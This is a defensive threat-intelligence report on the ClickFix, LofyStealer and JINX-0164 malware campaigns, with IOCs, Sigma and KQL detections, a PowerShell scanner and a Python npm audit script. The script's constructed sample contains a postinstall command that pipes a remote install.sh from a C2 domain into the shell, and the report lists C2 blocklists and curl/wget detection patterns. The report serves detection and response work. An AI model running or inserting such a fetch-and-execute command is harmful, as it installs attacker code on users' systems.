Recent OTX pulses indicate a convergence of sophisticated, financially motivated threat campaigns targeting distinct sectors: general end-users, gamers, and cryptocurrency developers.
- ClickFix utilizes a novel "BackgroundFix" lure, hijacking the clipboard to force victims to execute `finger.exe`, leading to a CastleLoader infection chain that drops NetSupport RAT and CastleStealer.
- LofyGang (LofyStealer) continues to evolve, employing a massive 53.5MB Node.js loader to obfuscate a memory-resident C++ infostealer targeting Minecraft players.
- JINX-0164 represents a tailored threat to the software supply chain, specifically targeting cryptocurrency organizations via LinkedIn social engineering and malicious NPM packages to deliver macOS-specific RATs (AUDIOFIX, MINIRAT).
Collectively, these actors abuse legitimate tools (finger.exe, Node.js) and platforms (LinkedIn, NPM) to bypass standard heuristic defenses, emphasizing the need for behavioral monitoring and strict software governance.
# Threat Actor / Malware Profile
1. ClickFix (CastleLoader, NetSupport RAT, CastleStealer)
- Distribution: Social engineering via fake image-editing tools ("BackgroundFix"). Prompts users to copy/paste commands containing `finger.exe`.
- Payload Behavior: `finger.exe` retrieves the CastleLoader payload, which decrypts and loads NetSupport RAT (remote access) and CastleStealer (data theft).
- C2 Communication: Connects to domains like `poronto.com` and `trindastal.com` on non-standard port 688.
- Persistence: Established via NetSupport RAT service configurations.
- Anti-Analysis: Uses a reflective loader to keep payloads in memory, avoiding disk writes.
2. LofyGang (LofyStealer / GrabBot)
- Distribution: Targeted social engineering against Minecraft players (e.g., fake mods, cheats).
- Payload Behavior: Two-stage attack. A massive Node.js loader unpacks a 1.4MB C++ payload executed directly in memory ("chromelevator"). Targets 8+ browsers for credentials.
- C2 Communication: Uses custom C2 protocols; capable of receiving syscalls to evade detection.
- Persistence: Registry manipulation and scheduled tasks common to infostealers.
- Anti-Analysis: Large loader size and memory-only execution frustrate sandbox detonation.
3. JINX-0164 (AUDIOFIX, MINIRAT)
- Distribution: LinkedIn phishing (posing as recruiters) and supply chain compromise via trojanized NPM packages.
- Payload Behavior:
- AUDIOFIX: Python-based infostealer/RAT for macOS.
- MINIRAT: Lightweight Go backdoor.
- C2 Communication: Communicates with infrastructure hosted on `driver-updater.net` and `live.ong`.
- Persistence: Launch agents and scripts (e.g., `install.sh`) on macOS.
- Anti-Analysis: Targets macOS infrastructure, which often has less EDR coverage than Windows counterparts.
# IOC Analysis
The indicators provided span multiple vectors requiring a layered defense approach:
- Domains & URLs: The pulses highlight specific C2 domains (`poronto.com`, `trindastal.com`, `driver-updater.net`) and typosquatting attempts (`login.teamicrosoft.com`). These should be blocked at the DNS and proxy level. Notably, HTTP traffic over port 688 to these specific domains is suspicious.
- File Hashes: A mix of SHA256 and MD5 hashes are provided for the loaders and payloads. These should be ingested into EDR solutions for immediate quarantine.
- Operationalization: SOC teams should use TIPs (Threat Intelligence Platforms) to auto-push these IOCs to blocklists. The presence of `finger.exe` in process logs is a high-fidelity behavioral indicator for the ClickFix campaign.
# Detection Engineering

```yaml
---
title: Potential ClickFix BackgroundFix Activity via Finger.exe
id: 20260604-001
description: Detects the execution of finger.exe, a legacy tool abused in ClickFix campaigns to retrieve malicious payloads via clipboard hijacking commands.
status: experimental
author: Security Arsenal
date: 2026/06/04
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\finger.exe'
  condition: selection
falsepositives:
  - Legitimate use of finger utility (rare in modern environments)
level: high
---
title: Suspicious Node.js Loader Spawning Shell (LofyStealer)
id: 20260604-002
description: Detects Node.js processes spawning cmd.exe or powershell.exe, indicative of the LofyStealer Node.js loader activating a C++ payload.
status: experimental
author: Security Arsenal
date: 2026/06/04
tags:
  - attack.execution
  - attack.t1059
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\node.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  condition: selection
falsepositives:
  - Legitimate development scripts
level: medium
---
title: macOS Suspicious Remote Installation Script (JINX-0164)
id: 20260604-003
description: Detects execution of remote installation scripts (install.sh) via curl or wget, associated with JINX-0164 supply chain attacks targeting crypto developers.
status: experimental
author: Security Arsenal
date: 2026/06/04
tags:
  - attack.initial_access
  - attack.t1190
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    Image|endswith:
      - '/curl'
      - '/wget'
    CommandLine|contains: 'install.sh'
  condition: selection
falsepositives:
  - Legitimate software installation
level: high
```
```kql
// Hunt for ClickFix finger.exe activity, LofyStealer Node.js shells, and C2 connections
let ClickFixDomains = dynamic(["trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com"]);
let JINXDomains = dynamic(["driver-updater.net", "login.teamicrosoft.com", "live.ong", "teams.live.us.org"]);
// 1. Process hunt: finger.exe execution (ClickFix)
let FingerHunt = DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "finger.exe" or ProcessVersionInfoOriginalFileName =~ "finger.exe"
| extend HuntType = "ClickFix_FingerExe"
| project Timestamp, DeviceName, AccountName, HuntType, ProcessCommandLine, InitiatingProcessFileName;
// 2. Process hunt: node.exe spawning a shell (LofyStealer loader); in~ is the case-insensitive set operator
let NodeShellHunt = DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "node.exe" and FileName in~ ("cmd.exe", "powershell.exe")
| extend HuntType = "NodeSpawningShell"
| project Timestamp, DeviceName, AccountName, HuntType, ProcessCommandLine, InitiatingProcessFileName;
// 3. Network hunt: connections to the known C2 and typosquat domains
let NetworkHunt = DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (ClickFixDomains) or RemoteUrl has_any (JINXDomains)
| extend HuntType = "C2_Domain"
| project Timestamp, DeviceName, HuntType, ActionType, RemoteUrl, RemotePort, RemoteIP;
// Kusto accepts a single tabular statement per query, so the three hunts are unioned into one result set
union FingerHunt, NodeShellHunt, NetworkHunt
| order by Timestamp desc
```
```powershell
# IOC Hunt Script for ClickFix, LofyStealer, and JINX-0164 Payloads
# Requires Admin Privileges
$MaliciousHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", # CastleLoader
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9", # NetSupport/Related
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881", # LofyStealer
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7", # LofyStealer
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"  # JINX-0164
)

Write-Host "[*] Scanning for known malicious file hashes (This may take time)..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
foreach ($Drive in $Drives) {
    Write-Host "Scanning $Drive..."
    # -File skips directories; -Force includes hidden and system files
    Get-ChildItem -Path $Drive -Recurse -File -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $FilePath = $_.FullName
        try {
            # -contains is case-insensitive, so the upper-case hash from Get-FileHash matches the list above
            $FileHash = (Get-FileHash -Path $FilePath -Algorithm SHA256 -ErrorAction Stop).Hash
            if ($MaliciousHashes -contains $FileHash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $FilePath (Hash: $FileHash)" -ForegroundColor Red
            }
        } catch {
            # Ignore files that cannot be read (locked or access denied)
        }
    }
}

Write-Host "[*] Checking for NetSupport RAT persistence in Registry..." -ForegroundColor Cyan
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
)
foreach ($RegPath in $Paths) {
    if (-not (Test-Path $RegPath)) { continue }
    # Each Run entry is a property of the key; skip the PS* metadata properties and flag
    # values that launch client32 (the NetSupport client binary) or are named after NetSupport
    $RunValues = Get-ItemProperty -Path $RegPath -ErrorAction SilentlyContinue
    $RunValues.PSObject.Properties |
    Where-Object { $_.Name -notlike "PS*" -and ($_.Value -match "client32" -or $_.Name -match "NetSupport") } |
    ForEach-Object {
        Write-Host "[!] Suspicious Persistence found in ${RegPath}: $($_.Name) = $($_.Value)" -ForegroundColor Yellow
    }
}
```
# Response Priorities
**Immediate (0-24h):**
1. **Block IOCs:** immediately block the listed domains (`poronto.com`, `driver-updater.net`, etc.) and file hashes on perimeter gateways and EDRs.
2. **Hunt for `finger.exe`:** Search historical logs for the execution of `finger.exe`. Any instance outside of specific legacy environments should be treated as a compromised host.
3. **Quarantine Hosts:** Isolate devices that have communicated over the non-standard port 688 associated with ClickFix.
**24h:**
1. **Credential Reset:** If LofyStealer or CastleStealer is suspected, force a password reset for affected users and invalidate session tokens (including Minecraft-related accounts where personal BYOD devices are involved, and crypto wallets for JINX-0164 targets).
2. **Supply Chain Audit:** For technology and crypto sectors, audit `package.` files and recent npm package installs for references to typosquatted domains or unexpected dependencies.
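The supply-chain audit in step 2 can be scripted. The following Python is an added example, not part of the original report or any vendor tool, that checks a parsed `package.json` and `package-lock.json` (lockfile v2/v3 layout) for the indicators the report describes: lifecycle scripts that `curl` or `wget` an `install.sh`, dependencies or resolved tarballs served from the listed domains or from any host other than `registry.npmjs.org`, missing integrity hashes, and npm's `hasInstallScript` flag. The sample inputs are constructed; in practice load the real files with `json.load`.

```python
from urllib.parse import urlparse
# Indicator domains from the report; registry.npmjs.org is treated as the only trusted tarball source
BLOCKED_DOMAINS = {"driver-updater.net", "login.teamicrosoft.com", "live.ong"}
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")  # run unattended on npm install
REMOTE_FETCH_TOKENS = ("curl", "wget", "install.sh")  # fetch-and-run pattern from the JINX-0164 pulse

def host_of(spec):
    """Hostname of a URL-style dependency spec or resolved tarball; '' for plain semver specs."""
    return (urlparse(spec).hostname or "").lower() if "://" in spec else ""

def host_findings(name, host, what):
    """Flag a blocklisted host, or any tarball host other than the trusted registry."""
    if host in BLOCKED_DOMAINS:
        return [(name, f"{what} points at blocklisted host {host}")]
    if host and host not in TRUSTED_REGISTRY_HOSTS:
        return [(name, f"{what} points at non-registry host {host}")]
    return []

def audit_project(package_json, package_lock):
    """Return (package, reason) findings for parsed package.json and package-lock.json (v2/v3) dicts."""
    findings = []
    # 1. Project lifecycle scripts that pull and execute remote content
    for hook, cmd in package_json.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS and any(t in cmd for t in REMOTE_FETCH_TOKENS):
            findings.append(("<root>", f"{hook} script fetches remote content: {cmd!r}"))
    # 2. Direct dependencies declared as URLs instead of registry versions
    for section in ("dependencies", "devDependencies"):
        for name, spec in package_json.get(section, {}).items():
            findings.extend(host_findings(name, host_of(spec), "dependency spec"))
    # 3. Locked packages: origin host, integrity pin, install-time hooks
    for path, meta in package_lock.get("packages", {}).items():
        if not path:  # "" is the root project entry
            continue
        name = path.rsplit("node_modules/", 1)[-1]
        findings.extend(host_findings(name, host_of(meta.get("resolved", "")), "resolved tarball"))
        if not meta.get("integrity"):
            findings.append((name, "no integrity hash; tarball contents cannot be verified"))
        if meta.get("hasInstallScript"):
            findings.append((name, "declares an install-time lifecycle script"))
    return findings

# Constructed sample inputs (not real packages) that exercise every check above
SAMPLE_PACKAGE_JSON = {"scripts": {"postinstall": "curl -s https://driver-updater.net/install.sh | sh"},
                       "dependencies": {"lodash": "^4.17.21", "audio-utils": "https://live.ong/audio-utils-1.0.0.tgz"}}
SAMPLE_PACKAGE_LOCK = {"packages": {
    "": {"name": "wallet-demo"},
    "node_modules/lodash": {"resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", "integrity": "sha512-CONSTRUCTED"},
    "node_modules/audio-utils": {"resolved": "https://live.ong/audio-utils-1.0.0.tgz", "hasInstallScript": True},
}}
```

Calling `audit_project(SAMPLE_PACKAGE_JSON, SAMPLE_PACKAGE_LOCK)` yields five findings: the remote-fetching postinstall script, and four for `audio-utils` (blocklisted spec host, blocklisted resolved host, no integrity hash, install script); `lodash` is clean.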
**1 Week:**
1. **Application Whitelisting:** Restrict the use of `finger.exe` and unsigned Node.js executables on non-developer endpoints.
2. **Awareness Training:** Update security awareness training to specifically highlight "clipboard hijacking" (ClickFix) and LinkedIn recruitment scams (JINX-0164).
3. **macOS Hardening:** Review and enforce strict controls on Gatekeeper and execution of unsigned scripts for developer workstations.